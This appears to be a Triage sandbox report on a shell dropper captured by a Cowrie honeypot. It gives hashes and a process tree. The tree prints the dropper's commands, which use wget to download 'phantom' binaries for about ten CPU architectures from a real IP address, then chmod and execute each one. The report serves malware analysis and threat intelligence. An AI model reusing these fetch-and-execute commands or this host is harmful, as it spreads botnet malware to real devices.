1b5d46e827ac989be8cb2f99aa8ce3724a8f0d37cee9ff044abe66d74e0b884a | Triage

Analysis

max time kernel
0s
max time network
102s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
18-10-2022 02:32

Sharing

Report Analysis Logs

General

Target

data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
Size

1KB
MD5

d282aeb196dc438987fa7fee1a0e660f
SHA1

050d2a4da69b9660a3a080292a08ee2db4f94eb3
SHA256

dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
SHA512

45fe0bd9a44b8ee979bf03e8557452c3b1026975809ccf13e0b334a31c0b8daef0628464952c4cc78537e08c5d4be96845ae3e700259200b81a0b8177c56d7fb

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c

description	ioc	process
/tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c	/tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c	dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c

/tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
/tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
1⤵
- Writes file to tmp directory
PID:593

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.x86
2⤵
PID:594

/bin/cat
cat phantom.x86
2⤵
PID:600

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:601

./robben
./robben Payload
2⤵
PID:602

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.mips
2⤵
PID:604

/bin/cat
cat phantom.mips
2⤵
PID:606

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:607

./robben
./robben Payload
2⤵
PID:608

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.mpsl
2⤵
PID:610

/bin/cat
cat phantom.mpsl
2⤵
PID:612

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:613

./robben
./robben Payload
2⤵
PID:614

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.arm4
2⤵
PID:616

/bin/cat
cat phantom.arm4
2⤵
PID:618

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:619

./robben
./robben Payload
2⤵
PID:620

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.arm5
2⤵
PID:622

/bin/cat
cat phantom.arm5
2⤵
PID:624

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:625

./robben
./robben Payload
2⤵
PID:626

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.arm6
2⤵
PID:628

/bin/cat
cat phantom.arm6
2⤵
PID:630

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:631

./robben
./robben Payload
2⤵
PID:632

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.arm7
2⤵
PID:634

/bin/cat
cat phantom.arm7
2⤵
PID:636

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:637

./robben
./robben Payload
2⤵
PID:638

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.ppc
2⤵
PID:640

/bin/cat
cat phantom.ppc
2⤵
PID:642

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:643

./robben
./robben Payload
2⤵
PID:644

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.m68k
2⤵
PID:646

/bin/cat
cat phantom.m68k
2⤵
PID:648

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:649

./robben
./robben Payload
2⤵
PID:650

/usr/bin/wget
wget http://154.16.115.249/bins/phantom.sh4
2⤵
PID:652

/bin/cat
cat phantom.sh4
2⤵
PID:654

/bin/chmod
chmod +x data robben systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:655

./robben
./robben Payload
2⤵
PID:656

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...